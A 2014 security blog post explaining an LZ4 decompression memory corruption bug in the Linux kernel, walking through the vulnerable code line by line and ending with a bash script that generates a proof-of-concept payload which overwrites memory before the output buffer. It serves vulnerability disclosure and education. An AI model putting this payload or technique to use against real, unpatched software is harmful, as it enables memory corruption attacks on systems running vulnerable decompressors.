Friday, June 27, 2014

Understanding the LZ4 Memory Corruption Vulnerability

You Don't Play Right

The entire premise behind security auditing is to identify ways that software can be abused. Period. Our concern as analysts is not to evaluate software "within the parameters in which it should be used". The best security bugs are slight abuses of an API outside of the normal use cases. So, when an engineer claims that a flaw isn't a flaw at all because "no one will ever use the API in that fashion", they are misinformed. Unfortunately, by asserting this, they are also misinforming their peers and users. 

A similar issue has arisen here. The claim has been made that LZ4 is not vulnerable because every implementation will only call it with a certain amount of memory. Ok, so those use cases aren't vulnerable. I admitted to this in my original blog post when I stated that ZFS is a perfect example of LZ4 not being vulnerable because they limit their block size to 128k. Regardless, I haven't audited every implementation of the LZ4 vulnerability, so I could not make the assertion as to whether all, some, or none of the use cases are vulnerable. That would be speculation, which is a waste of everyone's time. 

There is a more important point. The point is that the algorithm doesn't care about size. There is no check in the decompression routine to determine whether an input buffer is too large, or even within the bounds of the algorithm's specification. There is no validation routine to ensure that the output buffer doesn't exceed a threshold. This means that anyone can use that code and call it in any way they choose. The caller doesn't have to play by the author's original rules, and the caller may not even know the rules because the algorithm doesn't enforce any. 

In fact, there are certain cases where this is desirable behavior. For instance, Anti Virus and Anti Spyware programs must be able to parse compressed data in order to evaluate whether a file is suspicious. If known variants of a virus or spyware break a compression's specification to evade A/V detection, so must the A/V application. This leaves A/V utilities open to vulnerabilities that they did not even intend to have simply because they are using an API in an unintended, but valid, fashion. 

This is how a lot of security vulnerabilities arise in projects. Code isn't adequately documented, or API calls aren't adequately guarded to enforce the author's constraints. When these gaps occur in APIs meant for general consumption, failures will absolutely occur. It doesn't matter if all current users of the algorithm adhere to a certain standard. There is no guarantee that users in the future will. 

It's Just Not Big Enough

The claim that 64bit platforms are not exploitable is incorrect. This is the same mindset that created today's LZO/LZ4 vulnerability. "No one will ever have that much RAM to cause a 32bit integer overflow!". Well, today we do. If this bug would have persisted and propagated further, surely 64bit architectures would be effected in the not-so-near future. 

This kind of attitude has no longevity. If you're building a threat model for today instead of projections of what likely states can occur in the future as well as today, you're not building a safe platform suitable for public consumption. You might as well rewrite the implementation every couple of years to suit the new architectures and platforms that are available. 

If we want to engineer safe, efficient, long lasting code, it has to be done using foresight and threat models that accurately account for today and tomorrow's likely environment. Threat models are not built on a snapshot in time, but on a reasonable projection of the life of a project. If there is no value placed in the project's longevity, then it's not a professional long lasting project. Why use something that isn't expected to last? 

A Literal Run Around

Now, on to the fun part. The details of the exploit. Before anyone worries, I reached out to the Linux team to make sure that the patches are in a position where I can post this information. They did not protest, largely because only the API itself is vulnerable - there are no vectors from which exploitation can occur at this time. So, let's take a look. Feel free to follow along at the LXR site. For ease of demonstration, presume a 32bit architecture so the exploit below is practical to test. 

To trigger the bug, two things need to happen. First, we need to be able to point to an address outside the bounds of the valid decompression output buffer. Second, we need to be able to write to that buffer. Let's start out with issue number one. 

Pointing North

To successfully set the write pointer variable 'op' outside of the bounds of the valid decompression buffer, there are a few steps that must be taken. Otherwise, we will hit an error condition and be forced to return from the decompression routine with error. 

 64         while (1) {
 65 
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

The code above is the first code we encounter on entry to the lz4_uncompress routine. Line 69 is the start of the loop that allows for integer overflow. However, we can't use it. Why? If we perform a Literal Run length accumulator now, we will error out too early. Instead, we must ignore this instance of the vulnerability and move on. 

 78                 /* copy literals */
 79                 cpy = op + length;
 80                 if (unlikely(cpy > oend - COPYLENGTH)) {
 81                         /*
 82                          * Error: not enough place for another match
 83                          * (min 4) + 5 literals
 84                          */
 85                         if (cpy != oend)
 86                                 goto _output_error;
 87 
 88                         memcpy(op, ip, length);
 89                         ip += length;
 90                         break; /* EOF */
 91                 }
 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

Next, we have to bypass the above code without triggering an EOF condition and breaking the loop. To do this, we simply place a small literal copy value as the first input byte. This will ensure the expression at line 80 does not evaluate to True. 

The LZ4_WILDCOPY will copy a few bytes from the input pointer 'ip' into the output pointer 'op'. Note that 'ip' is reset to the current address minus the size of the actual copied bytes. The output pointer, as expected, now points past the copied bytes to the next available output byte. 

 96                 /* get offset */
 97                 LZ4_READ_LITTLEENDIAN_16(ref, cpy, ip);
 98                 ip += 2;
 99 
100                 /* Error: offset create reference outside destination buffer */
101                 if (unlikely(ref < (BYTE *const) dest))
102                         goto _output_error;

This is where things get slightly tricky. The above code on line 97 retrieves a 16bit little-endian "reference" value from the input buffer. Remember now the input buffer has been rewound? This means that we need to embed the reference value at the start of the literal copy. 

We also have to bypass the check at line 101. Since 'ref' is a pointer to the output buffer, and we can't really abuse it to corrupt memory, we should just set this to zero to ignore the whole mess. Therefore, we have our first real values in the payload: 0x00, 0x00. These two bytes will give us a 'ref' value offset of 0x0000. 

104                 /* get matchlength */
105                 length = token & ML_MASK;
106                 if (length == ML_MASK) {
107                         for (; *ip == 255; length += 255)
108                                 ip++;
109                         length += *ip++;
110                 }

Next, we hit the code chunk at line 105. The token value is the same value that it was at the beginning of this loop, when we entered the function. This means that the first byte of the input payload must be set to ML_MASK to perform the above (second) Literal Run size accumulator. Since ML_MASK is defined as 0x0f, this becomes our first byte in the payload. Now we know what the first three bytes have to be: 0x0f, 0x00, 0x00. 

Because the input pointer is now at address &input[3], and we are trying to abuse this accumulator loop to build a large value, we need a large amount of bytes here that equate to 255. On line 107, as long as a byte from the input buffer equals 255, the loop will continue, and 'length' will grow. 

Remember two things. First, the token value must have ML_MASK set. This means that the token variable must equate to 0x0f. This also means that the first Literal Run copies fifteen bytes. Our first two bytes in that copy buffer must be 0x00 0x00 for 'ref'. Thus, thirteen more bytes must be set to 0xff to complete that run. 

In this run, we will generate a sample value of 0xfffffff0. To do so, we need a total of 16,843,008 bytes set to 0xff. We already have thirteen bytes, so we need 16,842,995 more. 

To break out of the for loop, on line 107, we simply finish the run with the value 0xcd, which completes the 'length' variable's accumulation to 0xfffffff0. 

112                 /* copy repeated sequence */
113                 if (unlikely((op - ref) < STEPSIZE)) {

The expression at line 113 evaluates to True. We don't really care about this block of code because we don't have to accommodate for anything that is performed here. 

132                 cpy = op + length - (STEPSIZE - 4);
133                 if (cpy > (oend - COPYLENGTH)) {
134 
135                         /* Error: request to write beyond destination buffer */

This is where things get fun. On line 132, the overflow occurs. Now that we have a sufficiently large value in 'length', we can overflow the pointer 'op'. This will cause 'cpy' to point to an address prior to the start of the output buffer. Since it is before even the beginning of the output buffer, the expression on 133 will never evaluate to True, bypassing this error check.

150                 LZ4_SECURECOPY(ref, op, cpy);
151                 op = cpy; /* correction */
152         }

The LZ4_SECURECOPY is actually a NO-OP here. Why? It validates that 'op' is before 'cpy' before implementing the actual copy operation. As a result, no copy will occur. But, that is OK because we don't want the copy to occur here. Instead, something better happens. The pointer 'op' is set to 'cpy', ensuring that the output pointer now points to a memory address we control. 

Lastly, at line 152, we loop back to the top of the function. 

Writing Home

Now that we are back at the start of the while loop, we can write as much data to which ever address in memory we desire. How? We simply specify the size of the write using either the simple length value or the Literal Run accumulator loop. 

 64         while (1) {
 65 
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

Once the length is generated, a copy is executed in the following code that we've already looked at:

 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

That's it! The memory overwrite is complete. We have copied any number of bytes we choose to any where in memory we desire. This makes the LZ4 vulnerability far more precise than the LZO one. 

Make It Easy


At the bottom of this post, you'll find a script I've written to auto-generate the test payload above. It will overwrite memory 32 bytes prior to the start of the valid output buffer. This is valid memory corruption and can be tested fairly easily using the patched version of the Linux kernel's lz4_decompress.c from here.

Summary


To summarize, security auditing isn't about exploitation. Auditing is about finding critical bugs. Critical bugs don't have to have an immediate context for exploitation, they just have to have a legitimately critical implementation that could affect multiple platforms in the near future. This is true of the LZ4 vulnerability. Library based vulnerabilities are
  • Critical if they cause precise memory corruption, regardless of current use cases
  • Often present or are magnified in abnormal use cases such as Anti Virus applications 
  • Often vulnerable regardless of underlying architecture
  • Must be evaluated from a context of longevity
  • Cannot be ignored because current use cases aren't vulnerable; libraries can be used any way the application writer chooses
I hope this helps everyone understand my position on the critical nature of the LZ4 vulnerability. No, it currently wont get you Ring or Uid 0 on Linux. But, by closing this hole today, we know no one will in the future, either. And that's really what this is all about, right? 

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security
@InfoSecMouse
https://www.securitymouse.com/

#!/bin/bash
#
# LZ4 Exploit Payload Generator
# Don A. Bailey 
#
# Overwrites memory with "donbdonb" 32 bytes prior to the valid start of
# the decompression output buffer.
# June 27th, 2014
#

FILE=./test.lz4

append()
{
 printf $1 >> $FILE
}

init()
{
 rm -f $FILE
 touch $FILE
}

large()
{
 x="\"\\xff\" x $1"
 perl -e "print $x" >> $FILE
}

# initialize the file
init

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes 
large 16842995

# complete the sequence
append "\xcd"

# because cpy is lower than op, LZ4_SECURECOPY will fail
# op is now set to the mangled cpy

# create a simple literal run length without a RUN_MASK
# and copy 8 bytes to the corrupted pointer address
append "\x08"

append "donbdonb"


No comments:

Post a Comment